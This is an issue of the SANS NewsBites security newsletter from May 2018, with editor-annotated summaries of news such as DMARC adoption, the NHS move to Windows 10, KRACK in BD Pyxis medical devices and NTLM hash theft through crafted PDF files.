Take your cyber security skills to the next level with SANS training in Miami! Save $300 thru 11/20.

Newsletters: Newsbites

Subscribe to SANS Newsletters

Join the SANS Community to receive the latest curated cyber security news, vulnerabilities and mitigations, training opportunities, and our webcast schedule.

SANS NewsBites
@Risk: Security Alert
OUCH! Security Awareness
Case Leads DFIR Digest
Industrial Control Systems
Industrials & Infrastructure

SANS NewsBites is a semiweekly high-level executive summary of the most important news articles that have been published on computer security during the last week. Each news item is very briefly summarized and includes a reference on the web for detailed information, if possible.

Spend five minutes per week to keep up with the high-level perspective of all the latest security news. New issues are delivered free every Tuesday and Friday.

Volume XX - Issue #34

May 1, 2018

The National Cloud In-Security Panel's list of the ten most critical and damaging errors AWS users are making is published here along with the workshop invitation:

Washington, DC on June 8: https://www.sans.org/event/cloud-insecurity-summit-dc

Austin, TX on June 11: https://www.sans.org/event/cloud-insecurity-summit-tx


SANS NewsBites               May 1, 2018                Vol. 20, Num. 034



  Government Tops in DMARC Adoption
 What Makes a Cybersecurity Team Successful?


  UK National Health Service Systems Will Be Upgraded to Windows 10
  Microsoft's Trusted Cyber Physical Systems Project
  Thailand Seizes Server Allegedly Used by Hidden Cobra APT Group
  Prison Sentence for Jail System Hacker
  KRACK Vulnerability Affects BD Pyxis Medical Devices
  NATO Locked Shields Cyber Defense Exercise
  Malicious PDF Files Can Steal Windows NTLM Hashes
  Google and Microsoft Urge Georgia Governor to Veto Computer Crimes Bill
  DHS to Establish Bug Disclosure Policy


***************************  Sponsored By ExtraHop  ************************

Does your SOC feel reactive, flooded with alerts on assets you cant see and data you cant trust? Theres hope. Join Jon Oltsik (Sr. Principal Analyst, ESG) and ExtraHop for fresh research on how to build an action-oriented security architecture with complete visibility, advanced analytics, and automated investigation. Register: http://www.sans.org/info/203630


-- SANS Security West 2018 | San Diego, CA | May 11-18 | https://www.sans.org/event/security-west-2018

-- SANS Melbourne 2018 | May 14-26 | https://www.sans.org/event/melbourne-2018

-- SANS Northern VA Reston Spring 2018 | May 2025 | https://www.sans.org/event/northern-va-reston-spring-2018

-- SANS Amsterdam May 2018 | May 28-June 2 | https://www.sans.org/event/amsterdam-may-2018

-- SANS Rocky Mountain 2018 | Denver, CO | June 4-9 | https://www.sans.org/event/rocky-mountain-2018

-- SANS London June 2018 | June 4-12 | https://www.sans.org/event/london-june-2018

-- DFIR Summit & Training 2018 | Austin, TX | June 7-14 | https://www.sans.org/event/digital-forensics-summit-2018

-- Cloud In-Security Summit - DC | Crystal City, VA | June 8 | https://www.sans.org/event/cloud-insecurity-summit-dc

-- Cloud In-Security Summit - Austin | Austin, TX | June 11 | https://www.sans.org/event/cloud-insecurity-summit-tx

-- SANS Cyber Defence Canberra 2018 | June 25-July 7 | https://www.sans.org/event/cyber-defence-canberra-2018

-- SANS OnDemand and vLive Training

The SANS Training you want with the flexibility you need.

Special Offer: Get an iPad Pro with Smart Keyboard, a Microsoft Surface Pro or Take $350 Off with OnDemand or vLive Training until May 2.


-- Can't travel? SANS offers online instruction for maximum flexibility

-- Live Daytime training with Simulcasthttps://www.sans.org/simulcast

-- Evening training 2x per week for 6 weeks with vLive | https://www.sans.org/vlive

-- Anywhere, Anytime access for 4 months with OnDemand format | https://www.sans.org/ondemand/

Single Course Training

-- Single Course Training

SANS Mentor |  https://www.sans.org/mentor/about

Community SANS | https://www.sans.org/community/


-- View the full SANS course catalog and Cyber Security Skills Roadmap






Government Tops in DMARC Adoption

(April 26, 2018)

A study from ValiMail found that the US federal government has a higher adoption of DMARC than any other sector. Last fall, the Department of Homeland Security (DHS) issued Binding Operational Directive 18-01, which requires all federal agencies to adopt DMARC by January 2018. The ValiMail study found that at the end of the first quarter of 2018, 68 percent of federal government domains had installed DMARC. The tech sector was at 50 percent, banks at 36 percent, health care at 26 percent, and media companies at 13 percent. Prior to the DHS deadline for federal agencies, their adoption rate was at 19 percent. A separate study from the Global Cyber Alliance noted that most federal contractors had not adopted DMARC.     

[Editor Comments]

[Murray] DMARC resists a broadly used and successful attack; it is efficient; its cost is low when compared to the reduction in risk. It should be part of the essential measures undertaken by all enterprises.

[Neely] DMARC is a useful base capability which helps identify and allow quarantine or blocking of messages which inappropriately use your domain. There are now multiple reliable services that will help you analyze DMARC reports as well as help verify youre correctly implementing DMARC well before you impact any email traffic flows.

[Pescatore] The business disruption rate in DMARC adoption in private industry has been very low. There are easy lessons learned for avoiding the problems of years ago. The adoption rate remains low because there have been no forcing functions in the various compliance regimes. Supply chain security efforts should include DMARC adoption requirements in all RFPs and heavily weight them in evaluation criteria.

Read more in:

Nextgov: Government Leads Major Industries In Email Security


DHS: Binding Operational Directive 18-01



What Makes a Cybersecurity Team Successful?


(April 27, 2018)

The US Army Research Laboratory has found that cybersecurity teams perform best with minimal interaction. Instead, members of strong cybersecurity teams know their roles and responsibilities. The researchers drew their conclusions from their observation of teams competing at the Mid-Atlantic Collegiate Cyber Defense Competition earlier this spring.   

[Editor Comments]

[Pescatore] A lot of the news coverage of this has been very click-baity along the lines of "less interaction makes cybersecurity teams better." The real point is "well prepared, well trained, well managed teams using mature processes will perform better, and need less ad hoc personal interaction to do so." The other key point is a defensive exercise is very different from the day to day work of cybersecurity teams where interaction with management, IT and business units (external to the security team) is critical for successfully protecting the business.

[Murray] One difference between a "team" and any other group of people is a "plan."  At a minimum, a plan will say who will do what and when they will do it. This has been part of military doctrine since Ancient Rome.

Read more in:

US Army Research Laboratory: Cybersecurity teams that don't interact much perform best


Ars Technica: Army researchers find the best cyber teams are antisocial cyber teams


GCN: Want better security? Start by shutting up


**************************  SPONSORED LINKS  ********************************

1) GDPR: Key Considerations on the Path to Compliance. Learn how Splunk can help you address key articles. http://www.sans.org/info/203635

2) Don't Miss: "Tailored Intelligence for Automated Remediation: SANS Review of IntSights' Enterprise Intelligence and Mitigation Platform" Register: http://www.sans.org/info/203640

3) Join SANS for the 2nd Annual Automotive Cybersecurity Summit, May 7-8, in Chicago. http://www.sans.org/info/203645




UK National Health Service Systems Will Be Upgraded to Windows 10

(April 30, 2018)

The UK's Department of Health and Social Care says it has reached a deal with Microsoft to migrate all National Health Service (NHS) computers to Windows 10. One third of NHS trusts fell prey to the WannaCry ransomware attack a year ago, resulting in thousands of cancelled appointments and operations. Information from Microsoft and Kaspersky suggests that 98 percent of systems affected by WannaCry were running Windows 7. The Department of Health and Social Care is also establishing an NHS Digital Security Operation Centre.   

[Editor Comments]

[Neely] Beyond just upgrading systems to Windows 10, NHS is also working on defense in depth by addressing firewall, network security and alerting to build an effective SOC.

[Murray] Most software has a limited life. Enterprise use of that software should include a plan for end of life. That plan must address the uncertainty about what will replace the software and when it will be available.

Read more in:

Digital Health: NHS to be upgraded to Windows 10 as government agree to Microsoft deal


SC Magazine: NHS' new 150m Microsoft deal to upgrade all legacy systems to Windows 10


The Register: Brit healthcare system inks Windows 10 install pact with Microsoft


Bleeping Computer: UK Health Agency Switches to Windows 10 Citing WannaCry Ransomware Outbreak




Microsoft's Trusted Cyber Physical Systems Project

(April 24 & 30, 2018)

Microsoft's Trusted Cyber Physical Systems (TCPS) project "seeks to provide end-to-end security that is resilient to today's cyber-attacks" against industrial control systems (ICS) at organizations responsible for critical infrastructure. TCPS relies on four properties: "separation of critical execution, inspectability of execution process, attestability of processing environment, and minimizing number of entities that must be trusted."

Read more in:

Windows Blog: Trusted Cyber Physical Systems looks to protect your critical infrastructure from modern threats in the world of IoT


Bleeping Computer: Microsoft Wants to Secure IoT and ICS Devices With New TCPS Project




Thailand Seizes Server Allegedly Used by Hidden Cobra APT Group

(April 27 & 30, 2018)

Thailand's Computer Emergency Response team (ThaiCERT) has seized a server believed to have been operated by the North Korean APT group known as Hidden Cobra as a command-and-control server for the GhostSecret campaign. ThaiCERT is working with McAfee and authorities to analyze the machine, which was found at a university in Bangkok.  

Read more in:

The Register: Thailand seizes server linked to North Korean attack gang


SC Magazine: Secret no more: North Korea the likely culprit in complex GhostSecret cyber espionage campaign


Threatpost: ThaiCERT Seizes Hidden Cobra Server Linked to GhostSecret, Sony Attacks




Prison Sentence for Jail System Hacker

(April 26, 28, & 30, 2018)

A judge in Michigan has sentenced Konrads Voits to 87 months in prison for breaking into a jail computer system and altering data in an attempt to get an inmate released early. Voits was also ordered to pay $235,488 USD in restitution. Voits used social engineering to trick prison staff into allowing malware into their computers. Once he accessed the system, his activity was detected immediately.

[Editor Comments]

[Williams] Continuous network monitoring is key to all organizations and appears to have saved the day here. Though this sounds like the plot to a movie, without good security monitoring, it is possible that inmates might have been released early. Though sentencing records can probably not be modified directly from prison computers, time credits, early release information, and good behavior records probably can be. Far too often government organizations have little to no network monitoring.

Read more in:

ZDNet: Man who hacked jail systems to free associate sent behind bars


Bleeping Computer: Long Prison Sentence for Man Who Hacked Jail Computer System to Bust Out Friend


DOJ: Ypsilanti Man Sentenced in Computer Intrusion Case


Document Cloud: Voits Plea Agreement (December 1, 2017)



KRACK Vulnerability Affects BD Pyxis Medical Devices

(April 24 & 30, 2018)

Multiple medical devices made by Becton, Dickinson and Company (BD) have been found to be vulnerable to the KRACK key-reinstallation attack. The flaw could be exploited to alter and steal patient data. The KRACK vulnerability lies in the WPA and WPA2 Wi-Fi security protocol. The issue affects the BD Pyxis medication and supply management system. BD Pyxis is used in at least a dozen products. Patches are available for some of the affected products.   

Read more in:

ICS-CERT: Advisory (ICSMA-18-114-01) BD Pyxis


BD: Product security bulletin for WPA2 "KRACK" Wi-Fi Vulnerability


Threatpost: KRACK Vulnerability Puts Medical Devices at Risk




NATO Locked Shields Cyber Defense Exercise

(April 27, 2018)

NATO ran its annual cyber defense exercise. Locked Shields, as the exercise is known, is based in Estonia. Twenty-two blue teams comprised of cyber security experts from NATO member states defended the fictional country of Berylia from digital attacks against a military airbase and a major Internet service provider. More than 1,000 people from 30 countries participated in this year's exercise, which took place last week.  

[Editor Comments]

[Murray] "We fight as we train as we fight." An attack against electrical and financial infrastructure might be a more productive training assumption.

Read more in:

CCDCOE: More than 1000 cyber experts from 30 nations took part in Locked Shields


ZDNet: This giant cyber defence exercise has teams defending power grids, 4G networks, drones from hacker attack


SC Magazine UK: Nato wins largest cyber-defence exercise; Portugal, Australia join CCDCOE




Malicious PDF Files Can Steal Windows NTLM Hashes

(April 26 & 27, 2018)

Researchers from Check Point have found that maliciously crafted PDF files could be used to steal Windows credentials by merely tricking users into opening a file that contains embedded remote documents and files. While the attack has been tested on only Adobe Acrobat and FoxIT Reader, other PDF readers are likely vulnerable as well.

[Editor Comments]

[Ullrich] This type of vulnerability is not exactly new and has been fixed in other software (for example web browsers). The problem is that a system can be tricked into connecting to a malicious SMB server if a user opens a document that loads external resources via SMB. This was a big problem for web browsers that attempted to load resources like images via SMB if an SMB URL was provided. Most organizations understand that it is important to block inbound SMB connections. But outbound SMB connections are often allowed which then leads to software being able to connect to SMB servers (and passing credentials to them).

[Williams] This is just a variation on a long-running trick that uses MS Office files. It's worth noting that this isn't an issue if you just block TCP ports 135, 139, and 445 outbound from the network. If these are blocked outbound, then the only vector for exploiting this is if an attacker delivers the PDF from inside the network (in which case the game is already over).

Read more in:

Check Point: NTLM Credentials Theft via PDF Files


Bleeping Computer: PDF Files Can Be Abused to Steal Windows Credentials




Google and Microsoft Urge Georgia Governor to Veto Computer Crimes Bill

(April 27, 2018)

In an April 16, 2018 letter, Google and Microsoft have asked the governor of the US state of Georgia to veto a computer crimes bill passed by the state's general assembly. The letter states the companies' objection to an exemption in the bill that allows hacking back against adversaries "under the undefined guise of cybersecurity," noting that the provision could easily be abused. The bill has received additional criticism from those who say it could stifle legitimate research.

[Editor Comments]

[Pescatore] The language in the bill in almost all areas is waaay too broad to be of any benefit to any business other than law firms who will get paid on both sides of frivolous law suits that would invariably lead to the language of the bill being made more specific. Better to fix it now.

[Northcutt] The New Yorker just released a piece that is making the rounds of cybersecurity mailing lists that gives another perspective on hacking back: https://www.newyorker.com/magazine/2018/05/07/the-digital-vigilantes-who-hack-back

Read more in:

Cyberscoop: Google and Microsoft ask Georgia governor to veto 'hack back' bill


Georgia General Assembly Legislation: SB 315




DHS to Establish Bug Disclosure Policy

(April 26, 2018)

The US Department of Homeland Security (DHS) plans to create a bug disclosure policy that will pave the way for ethical hackers to notify the agency when they discover security issues in its public-facing websites and tools. DHS currently has an informal bug disclosure process. An established policy would not only provide a specific point of contact but also clarify how those searching for bugs can do so without violating agency policies and federal laws.

[Editor Comments]

Read more in:

Nextgov: DHS Plans To Formalize Bug Disclosure Policy





A Few Sample Drupal Exploits Including CVE-2018-7602


Triggering SMB Connections to Steal NTLM Credentials via PDFs


NTFS Crash DoS Exploit Published for Windows 10 and 7


Apple HomeKit/Secure Element Problems


Azucar Assessing Azure Security



April WebLogic Patch Incomplete and Intense Scanning for WebLogic Under Way


Facex Worm Spreads Malicious Chrome Extensions via Facebook


$15 DTV Transmitter as a SDR



The Editorial Board of SANS NewsBites


John Pescatore was Vice President at Gartner Inc. for fourteen years. He became a director of the SANS Institute in 2013. He has worked in computer and network security since 1978 including time at the NSA and the U.S. Secret Service.

Shawn Henry is president of CrowdStrike Services. He retired as FBI Executive Assistant Director responsible for all criminal and cyber programs and investigations worldwide, as well as international operations and the FBI's critical incident response.

Suzanne Vautrinot was Commander of the 24th Air Force (AF Cyber) and now sits on the board of directors of Wells Fargo and several other major organizations.

Ed Skoudis is co-founder of CounterHack, the nation's top producer of cyber ranges, simulations, and competitive challenges, now used from high schools to the Air Force. He is also author and lead instructor of the SANS Hacker Exploits and Incident Handling course, and Penetration Testing course.

Michael Assante was Vice President and Chief Security Officer at NERC, led a key control systems group at Idaho National Labs, and was American Electric Power's CSO. He now leads the global cyber skills development program at SANS for power, oil & gas and other critical infrastructure industries.

Mark Weatherford is Chief Cybersecurity Strategist at vArmour and the former Deputy Under Secretary of Cybersecurity at the US Department of Homeland Security.

Stephen Northcutt teaches advanced courses in cyber security management; he founded the GIAC certification and was the founding President of STI, the premier skills-based cyber security graduate school, www.sans.edu.

Dr. Johannes Ullrich is Chief Technology Officer of the Internet Storm Center and Dean of the Faculty of the graduate school at the SANS Technology Institute.

William Hugh Murray is an executive consultant and trainer in Information Assurance and Associate Professor at the Naval Postgraduate School.

Lee Neely is a Senior Cyber Analyst at Lawrence Livermore National Laboratory, SANS Analyst and Mentor. He has worked in computer security since 1989.

Rob Lee is the SANS Institute's top forensics instructor and director of the digital forensics and incident response research and education program at SANS (computer-forensics.sans.org).

Tom Liston is member of the Cyber Network Defense team at UAE-based Dark Matter. He is a Handler for the SANS Institute's Internet Storm Center and co-author of the book Counter Hack Reloaded.

Jake Williams is a SANS course author and the founder of Rendition Infosec, with experience securing DoD, healthcare, and ICS environments.

Dr. Eric Cole is an instructor, author and fellow with The SANS Institute. He has written five books, including Insider Threat and he is a founder with Secure Anchor Consulting.

Mason Brown is one of a very small number of people in the information security field who have held a top management position in a Fortune 50 company (Alcoa). He leads SANS' efforts to raise the bar in cybersecurity education around the world.

David Hoelzer is the director of research & principal examiner for Enclave Forensics and a senior fellow with the SANS Technology Institute.

Gal Shpantzer is a trusted advisor to CSOs of large corporations, technology startups, Ivy League universities and non-profits specializing in critical infrastructure protection. Gal created the Security Outliers project in 2009, focusing on the role of culture in risk management outcomes and contributes to the Infosec Burnout project.

Eric Cornelius is Director of Critical Infrastructure and ICS at Cylance, and earlier served as deputy director and chief technical analyst for the Control Systems Security Program at the US Department of Homeland Security.

Alan Paller is director of research at the SANS Institute.

Brian Honan is an independent security consultant based in Dublin, Ireland.

David Turley is SANS operations manager and serves as production manager and final editor on SANS NewsBites.

Please feel free to share this with interested parties via email, but no posting is allowed on web sites. For a free subscription visit https://www.sans.org/account/create